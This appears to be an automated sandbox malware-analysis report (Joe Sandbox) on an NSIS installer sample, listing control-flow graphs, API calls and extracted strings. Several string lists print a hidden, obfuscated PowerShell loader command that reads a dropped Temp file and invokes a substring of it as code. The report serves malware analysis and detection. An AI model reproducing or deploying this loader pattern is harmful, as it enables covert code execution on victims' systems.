calls 3545->3546 3547 405479 3546->3547 3547->3541 3549 405425 3548->3549 3550 405429 GetLastError 3548->3550 3549->3541 3550->3549 3551 405438 SetFileSecurityA 3550->3551 3551->3549 3552 40544e GetLastError 3551->3552 3552->3549 3553->3540 3555 405465 3554->3555 3556 405469 GetLastError 3554->3556 3555->3541 3556->3555 4437 4016b3 4438 402a3a 18 API calls 4437->4438 4439 4016b9 GetFullPathNameA 4438->4439 4440 4016d0 4439->4440 4441 4016f1 4439->4441 4440->4441 4444 405ffd 2 API calls 4440->4444 4442 401705 GetShortPathNameA 4441->4442 4443 4028cf 4441->4443 4442->4443 4445 4016e1 4444->4445 4445->4441 4447 405cf9 lstrcpynA 4445->4447 4447->4441 4448 403637 4449 403642 4448->4449 4450 403646 4449->4450 4451 403649 GlobalAlloc 4449->4451 4451->4450 4459 4014b7 4460 4014bd 4459->4460 4461 401389 2 API calls 4460->4461 4462 4014c5 4461->4462 4463 401d38 GetDC GetDeviceCaps 4464 402a1d 18 API calls 4463->4464 4465 401d56 MulDiv ReleaseDC 4464->4465 4466 402a1d 18 API calls 4465->4466 4467 401d75 4466->4467 4468 405d1b 18 API calls 4467->4468 4469 401dae CreateFontIndirectA 4468->4469 4470 402513 4469->4470 3816 40173e 3817 402a3a 18 API calls 3816->3817 3818 401745 3817->3818 3819 40599b 2 API calls 3818->3819 3820 40174c 3819->3820 3821 40599b 2 API calls 3820->3821 3821->3820 4471 401ebe 4472 402a3a 18 API calls 4471->4472 4473 401ec5 4472->4473 4474 405ffd 2 API calls 4473->4474 4475 401ecb 4474->4475 4477 401edd 4475->4477 4478 405c57 wsprintfA 4475->4478 4478->4477 4479 40193f 4480 402a3a 18 API calls 4479->4480 4481 401946 lstrlenA 4480->4481 4482 402513 4481->4482

                                      Executed Functions

                                      Function 004030D9 Relevance: 91.4, APIs: 33, Strings: 19, Instructions: 357stringcomfileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 4030d9-40310e SetErrorMode GetVersion 1 403110-403118 call 406092 0->1 2 403121 0->2 1->2 8 40311a 1->8 3 403126-403139 call 406024 lstrlenA 2->3 9 40313b-4031ae call 406092 * 2 #17 OleInitialize SHGetFileInfoA call 405cf9 GetCommandLineA call 405cf9 GetModuleHandleA 3->9 8->2 18 4031b0-4031b5 9->18 19 4031ba-4031cf call 405796 CharNextA 9->19 18->19 22 403294-403298 19->22 23 4031d4-4031d7 22->23 24 40329e 22->24 25 4031d9-4031dd 23->25 26 4031df-4031e7 23->26 27 4032b1-4032cb GetTempPathA call 4030a8 24->27 25->25 25->26 28 4031e9-4031ea 26->28 29 4031ef-4031f2 26->29 36 403323-40333d DeleteFileA call 402c66 27->36 37 4032cd-4032eb GetWindowsDirectoryA lstrcatA call 4030a8 27->37 28->29 31 403284-403291 call 405796 29->31 32 4031f8-4031fc 29->32 31->22 47 403293 31->47 34 403214-403241 32->34 35 4031fe-403204 32->35 43 403243-403249 34->43 44 403254-403282 34->44 41 403206-403208 35->41 42 40320a 35->42 52 4033d1-4033e1 call 40359f OleUninitialize 36->52 53 403343-403349 36->53 37->36 55 4032ed-40331d GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030a8 37->55 41->34 41->42 42->34 48 40324b-40324d 43->48 49 40324f 43->49 44->31 51 4032a0-4032ac call 405cf9 44->51 47->22 48->44 48->49 49->44 51->27 66 403505-40350b 52->66 67 4033e7-4033f7 call 4054ef ExitProcess 52->67 56 4033c1-4033c8 call 403679 53->56 57 40334b-403356 call 405796 53->57 55->36 55->52 64 4033cd 56->64 68 403358-403381 57->68 69 40338c-403396 57->69 64->52 71 403587-40358f 66->71 72 40350d-403526 GetCurrentProcess OpenProcessToken 66->72 73 403383-403385 68->73 76 403398-4033a5 call 405859 69->76 77 4033fd-403411 call 405472 lstrcatA 69->77 74 403591 71->74 75 403595-403599 ExitProcess 71->75 79 403558-403566 call 406092 72->79 80 403528-403552 LookupPrivilegeValueA AdjustTokenPrivileges 72->80 73->69 82 403387-40338a 73->82 74->75 76->52 90 4033a7-4033bd call 405cf9 * 2 76->90 91 403413-403419 lstrcatA 77->91 92 40341e-403438 lstrcatA lstrcmpiA 77->92 88 403574-40357e ExitWindowsEx 79->88 89 403568-403572 79->89 80->79 82->69 82->73 88->71 94 403580-403582 call 40140b 88->94 89->88 89->94 90->56 91->92 92->52 93 40343a-40343d 92->93 96 403446 call 405455 93->96 97 40343f-403444 call 4053d8 93->97 94->71 106 40344b-403458 SetCurrentDirectoryA 96->106 97->106 107 403465-40348d call 405cf9 106->107 108 40345a-403460 call 405cf9 106->108 112 403493-4034af call 405d1b DeleteFileA 107->112 108->107 115 4034f0-4034f7 112->115 116 4034b1-4034c1 CopyFileA 112->116 115->112 118 4034f9-403500 call 405bb4 115->118 116->115 117 4034c3-4034e3 call 405bb4 call 405d1b call 40548a 116->117 117->115 127 4034e5-4034ec CloseHandle 117->127 118->52 127->115
                                      APIs
                                      • SetErrorMode.KERNELBASE ref: 004030FE
                                      • GetVersion.KERNEL32 ref: 00403104
                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040312D
                                      • #17.COMCTL32(00000007,00000009), ref: 0040314F
                                      • OleInitialize.OLE32(00000000), ref: 00403156
                                      • SHGetFileInfoA.SHELL32(0041ECC8,00000000,?,00000160,00000000), ref: 00403172
                                      • GetCommandLineA.KERNEL32(00422F00,NSIS Error), ref: 00403187
                                      • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\anziOUzZJs.exe",00000000), ref: 0040319A
                                      • CharNextA.USER32(00000000,"C:\Users\user\Desktop\anziOUzZJs.exe",00000020), ref: 004031C5
                                      • GetTempPathA.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020), ref: 004032C2
                                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 004032D3
                                      • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004032DF
                                      • GetTempPathA.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004032F3
                                      • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 004032FB
                                      • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 0040330C
                                      • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 00403314
                                      • DeleteFileA.KERNELBASE(1033), ref: 00403328
                                        • Part of subcall function 00406092: GetModuleHandleA.KERNEL32(?,?,?,00403143,00000009), ref: 004060A4
                                        • Part of subcall function 00406092: GetProcAddress.KERNEL32(00000000,?), ref: 004060BF
                                      • OleUninitialize.OLE32(?), ref: 004033D6
                                      • ExitProcess.KERNEL32 ref: 004033F7
                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403514
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 0040351B
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403533
                                      • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403552
                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403576
                                      • ExitProcess.KERNEL32 ref: 00403599
                                        • Part of subcall function 004054EF: MessageBoxIndirectA.USER32(00409218), ref: 0040554A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                      • String ID: "$"C:\Users\user\Desktop\anziOUzZJs.exe"$"powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe$C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe$C:\Users\user\Desktop$C:\Users\user\Desktop\anziOUzZJs.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                      • API String ID: 3329125770-3344835159
                                      • Opcode ID: 4f4e7a4209cacf2233f42e90a73ac4821f0654123dbc60adf3f7537713659d44
                                      • Instruction ID: e7c85c4fe1f62676e3f8a08d8ca43f8bf3783ba147aef7bb7f1979754dcbcc24
                                      • Opcode Fuzzy Hash: 4f4e7a4209cacf2233f42e90a73ac4821f0654123dbc60adf3f7537713659d44
                                      • Instruction Fuzzy Hash: B7C1E5706083417AE711AF71AD8DA2B7EA8EB85306F04457FF541B61D2C77C5A05CB2E
                                      Function 00405050 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 128 405050-40506c 129 405072-405139 GetDlgItem * 3 call 403f13 call 4047b0 GetClientRect GetSystemMetrics SendMessageA * 2 128->129 130 4051fb-405201 128->130 153 405157-40515a 129->153 154 40513b-405155 SendMessageA * 2 129->154 132 405203-405225 GetDlgItem CreateThread FindCloseChangeNotification 130->132 133 40522b-405237 130->133 132->133 135 405259-40525f 133->135 136 405239-40523f 133->136 139 405261-405267 135->139 140 4052b4-4052b7 135->140 137 405241-405254 ShowWindow * 2 call 403f13 136->137 138 40527a-405281 call 403f45 136->138 137->135 150 405286-40528a 138->150 143 405269-405275 call 403eb7 139->143 144 40528d-40529d ShowWindow 139->144 140->138 147 4052b9-4052bf 140->147 143->138 151 4052ad-4052af call 403eb7 144->151 152 40529f-4052a8 call 404f12 144->152 147->138 148 4052c1-4052d4 SendMessageA 147->148 155 4053d1-4053d3 148->155 156 4052da-405306 CreatePopupMenu call 405d1b AppendMenuA 148->156 151->140 152->151 157 40516a-405181 call 403ede 153->157 158 40515c-405168 SendMessageA 153->158 154->153 155->150 165 405308-405318 GetWindowRect 156->165 166 40531b-405331 TrackPopupMenu 156->166 167 405183-405197 ShowWindow 157->167 168 4051b7-4051d8 GetDlgItem SendMessageA 157->168 158->157 165->166 166->155 169 405337-405351 166->169 170 4051a6 167->170 171 405199-4051a4 ShowWindow 167->171 168->155 172 4051de-4051f6 SendMessageA * 2 168->172 173 405356-405371 SendMessageA 169->173 174 4051ac-4051b2 call 403f13 170->174 171->174 172->155 173->173 175 405373-405393 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 173->175 174->168 177 405395-4053b5 SendMessageA 175->177 177->177 178 4053b7-4053cb GlobalUnlock SetClipboardData CloseClipboard 177->178 178->155
                                      APIs
                                      • GetDlgItem.USER32(?,00000403), ref: 004050AF
                                      • GetDlgItem.USER32(?,000003EE), ref: 004050BE
                                      • GetClientRect.USER32(?,?), ref: 004050FB
                                      • GetSystemMetrics.USER32(00000002), ref: 00405102
                                      • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405123
                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405134
                                      • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405147
                                      • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405155
                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405168
                                      • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040518A
                                      • ShowWindow.USER32(?,00000008), ref: 0040519E
                                      • GetDlgItem.USER32(?,000003EC), ref: 004051BF
                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051CF
                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051E8
                                      • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004051F4
                                      • GetDlgItem.USER32(?,000003F8), ref: 004050CD
                                        • Part of subcall function 00403F13: SendMessageA.USER32(00000028,?,00000001,00403D44), ref: 00403F21
                                      • GetDlgItem.USER32(?,000003EC), ref: 00405210
                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00004FE4,00000000), ref: 0040521E
                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00405225
                                      • ShowWindow.USER32(00000000), ref: 00405248
                                      • ShowWindow.USER32(?,00000008), ref: 0040524F
                                      • ShowWindow.USER32(00000008), ref: 00405295
                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052C9
                                      • CreatePopupMenu.USER32 ref: 004052DA
                                      • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004052EF
                                      • GetWindowRect.USER32(?,000000FF), ref: 0040530F
                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405328
                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405364
                                      • OpenClipboard.USER32(00000000), ref: 00405374
                                      • EmptyClipboard.USER32 ref: 0040537A
                                      • GlobalAlloc.KERNEL32(00000042,?), ref: 00405383
                                      • GlobalLock.KERNEL32(00000000), ref: 0040538D
                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053A1
                                      • GlobalUnlock.KERNEL32(00000000), ref: 004053BA
                                      • SetClipboardData.USER32(00000001,00000000), ref: 004053C5
                                      • CloseClipboard.USER32 ref: 004053CB
                                      Strings
                                      • Concrescences Setup: Completed, xrefs: 00405340
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                      • String ID: Concrescences Setup: Completed
                                      • API String ID: 4154960007-732904307
                                      • Opcode ID: 2f7611a0bce828b228995c06d13905ff2deeaa3c0883401f0d5d6c5519410eed
                                      • Instruction ID: 36ba5585b1d224b9782629df23ee11add298fe1a6f2e37662bad4ed6ffe984ff
                                      • Opcode Fuzzy Hash: 2f7611a0bce828b228995c06d13905ff2deeaa3c0883401f0d5d6c5519410eed
                                      • Instruction Fuzzy Hash: 46A159B1900208BFDB119FA0DD85AAE7F79FB48355F10407AFA01B61A0C7B55E41DF69
                                      Function 00405D1B Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 199stringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 423 405d1b-405d26 424 405d28-405d37 423->424 425 405d39-405d4e 423->425 424->425 426 405f41-405f45 425->426 427 405d54-405d5f 425->427 429 405d71-405d7b 426->429 430 405f4b-405f55 426->430 427->426 428 405d65-405d6c 427->428 428->426 429->430 431 405d81-405d88 429->431 432 405f60-405f61 430->432 433 405f57-405f5b call 405cf9 430->433 434 405f34 431->434 435 405d8e-405dc3 431->435 433->432 437 405f36-405f3c 434->437 438 405f3e-405f40 434->438 439 405dc9-405dd4 GetVersion 435->439 440 405ede-405ee1 435->440 437->426 438->426 441 405dd6-405dda 439->441 442 405dee 439->442 443 405f11-405f14 440->443 444 405ee3-405ee6 440->444 441->442 448 405ddc-405de0 441->448 445 405df5-405dfc 442->445 446 405f22-405f32 lstrlenA 443->446 447 405f16-405f1d call 405d1b 443->447 449 405ef6-405f02 call 405cf9 444->449 450 405ee8-405ef4 call 405c57 444->450 451 405e01-405e03 445->451 452 405dfe-405e00 445->452 446->426 447->446 448->442 455 405de2-405de6 448->455 460 405f07-405f0d 449->460 450->460 458 405e05-405e28 call 405be0 451->458 459 405e3c-405e3f 451->459 452->451 455->442 461 405de8-405dec 455->461 471 405ec5-405ec9 458->471 472 405e2e-405e37 call 405d1b 458->472 464 405e41-405e4d GetSystemDirectoryA 459->464 465 405e4f-405e52 459->465 460->446 463 405f0f 460->463 461->445 467 405ed6-405edc call 405f64 463->467 468 405ec0-405ec3 464->468 469 405e54-405e62 GetWindowsDirectoryA 465->469 470 405ebc-405ebe 465->470 467->446 468->467 468->471 469->470 470->468 473 405e64-405e6e 470->473 471->467 476 405ecb-405ed1 lstrcatA 471->476 472->468 478 405e70-405e73 473->478 479 405e88-405e9e SHGetSpecialFolderLocation 473->479 476->467 478->479 483 405e75-405e7c 478->483 480 405ea0-405eb7 SHGetPathFromIDListA CoTaskMemFree 479->480 481 405eb9 479->481 480->468 480->481 481->470 484 405e84-405e86 483->484 484->468 484->479
                                      APIs
                                      • GetVersion.KERNEL32(?,sportspladsers,00000000,00404F4A,sportspladsers,00000000), ref: 00405DCC
                                      • GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 00405E47
                                      • GetWindowsDirectoryA.KERNEL32(: Completed,00000400), ref: 00405E5A
                                      • SHGetSpecialFolderLocation.SHELL32(?,0040E8C0), ref: 00405E96
                                      • SHGetPathFromIDListA.SHELL32(0040E8C0,: Completed), ref: 00405EA4
                                      • CoTaskMemFree.OLE32(0040E8C0), ref: 00405EAF
                                      • lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00405ED1
                                      • lstrlenA.KERNEL32(: Completed,?,sportspladsers,00000000,00404F4A,sportspladsers,00000000), ref: 00405F23
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                      • String ID: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)"$: Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$sportspladsers
                                      • API String ID: 900638850-1033670284
                                      • Opcode ID: fb8208971b7bef3eab874112c295b4c22afd955e6dbc7abb81a1d2e78964ecc6
                                      • Instruction ID: 70d043a0125fa0970afc212ad974551980140434863585fcf13b89b4fbf53fe2
                                      • Opcode Fuzzy Hash: fb8208971b7bef3eab874112c295b4c22afd955e6dbc7abb81a1d2e78964ecc6
                                      • Instruction Fuzzy Hash: AD61F471A04A01ABDF205F64DC88B7F3BA8DB41305F50803BE941B62D0D27D4A82DF5E
                                      Function 0040559B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 485 40559b-4055c1 call 405859 488 4055c3-4055d5 DeleteFileA 485->488 489 4055da-4055e1 485->489 490 405764-405768 488->490 491 4055e3-4055e5 489->491 492 4055f4-405604 call 405cf9 489->492 493 405712-405717 491->493 494 4055eb-4055ee 491->494 500 405613-405614 call 4057b2 492->500 501 405606-405611 lstrcatA 492->501 493->490 496 405719-40571c 493->496 494->492 494->493 498 405726-40572e call 405ffd 496->498 499 40571e-405724 496->499 498->490 509 405730-405744 call 40576b call 405553 498->509 499->490 504 405619-40561c 500->504 501->504 505 405627-40562d lstrcatA 504->505 506 40561e-405625 504->506 508 405632-405650 lstrlenA FindFirstFileA 505->508 506->505 506->508 510 405656-40566d call 405796 508->510 511 405708-40570c 508->511 521 405746-405749 509->521 522 40575c-40575f call 404f12 509->522 518 405678-40567b 510->518 519 40566f-405673 510->519 511->493 513 40570e 511->513 513->493 524 40567d-405682 518->524 525 40568e-40569c call 405cf9 518->525 519->518 523 405675 519->523 521->499 526 40574b-40575a call 404f12 call 405bb4 521->526 522->490 523->518 528 405684-405686 524->528 529 4056e7-4056f9 FindNextFileA 524->529 535 4056b3-4056be call 405553 525->535 536 40569e-4056a6 525->536 526->490 528->525 534 405688-40568c 528->534 529->510 533 4056ff-405702 FindClose 529->533 533->511 534->525 534->529 545 4056c0-4056c3 535->545 546 4056df-4056e2 call 404f12 535->546 536->529 538 4056a8-4056b1 call 40559b 536->538 538->529 548 4056c5-4056d5 call 404f12 call 405bb4 545->548 549 4056d7-4056dd 545->549 546->529 548->529 549->529
                                      APIs
                                      • DeleteFileA.KERNELBASE(?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004055C4
                                      • lstrcatA.KERNEL32(00420D10,\*.*,00420D10,?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 0040560C
                                      • lstrcatA.KERNEL32(?,00409014,?,00420D10,?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 0040562D
                                      • lstrlenA.KERNEL32(?,?,00409014,?,00420D10,?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405633
                                      • FindFirstFileA.KERNEL32(00420D10,?,?,?,00409014,?,00420D10,?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405644
                                      • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004056F1
                                      • FindClose.KERNEL32(00000000), ref: 00405702
                                      Strings
                                      • "C:\Users\user\Desktop\anziOUzZJs.exe", xrefs: 0040559B
                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004055A8
                                      • \*.*, xrefs: 00405606
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                      • String ID: "C:\Users\user\Desktop\anziOUzZJs.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
                                      • API String ID: 2035342205-686800114
                                      • Opcode ID: 460e34fa800b99f1e5f166b8e7224cb9b6121c256d4ab4e0343d3576c8fd47da
                                      • Instruction ID: 44541a5d5af4c0b2911f4644f2fa5328a4f1ed3919081d24b86541679c9c03d6
                                      • Opcode Fuzzy Hash: 460e34fa800b99f1e5f166b8e7224cb9b6121c256d4ab4e0343d3576c8fd47da
                                      • Instruction Fuzzy Hash: 9F51CF30804A04BADF217A658C85BBF7AB8DF82318F54847BF445761D2C73D4982EE6E
                                      Function 0040205E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 750 40205e-4020c3 call 402a3a * 5 call 4057d8 763 4020c5-4020c7 call 402a3a 750->763 764 4020cc-4020e5 CoCreateInstance 750->764 763->764 766 4021bb-4021c2 764->766 767 4020eb-402101 764->767 768 4021c4-4021c9 call 401423 766->768 772 402107-402118 767->772 773 4021ad-4021b9 767->773 774 4028cf-4028de 768->774 780 402128-40212a 772->780 781 40211a-402123 772->781 773->766 778 4021ce-4021d0 773->778 778->768 778->774 782 402136-402147 780->782 783 40212c-402131 780->783 781->780 785 402156-402171 782->785 786 402149-402152 782->786 783->782 789 402173-402191 MultiByteToWideChar 785->789 790 4021a4-4021a8 785->790 786->785 789->790 791 402193-40219d 789->791 790->773 792 4021a1 791->792 792->790
                                      APIs
                                      • CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                      Strings
                                      • C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe, xrefs: 0040211D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: ByteCharCreateInstanceMultiWide
                                      • String ID: C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe
                                      • API String ID: 123533781-143564976
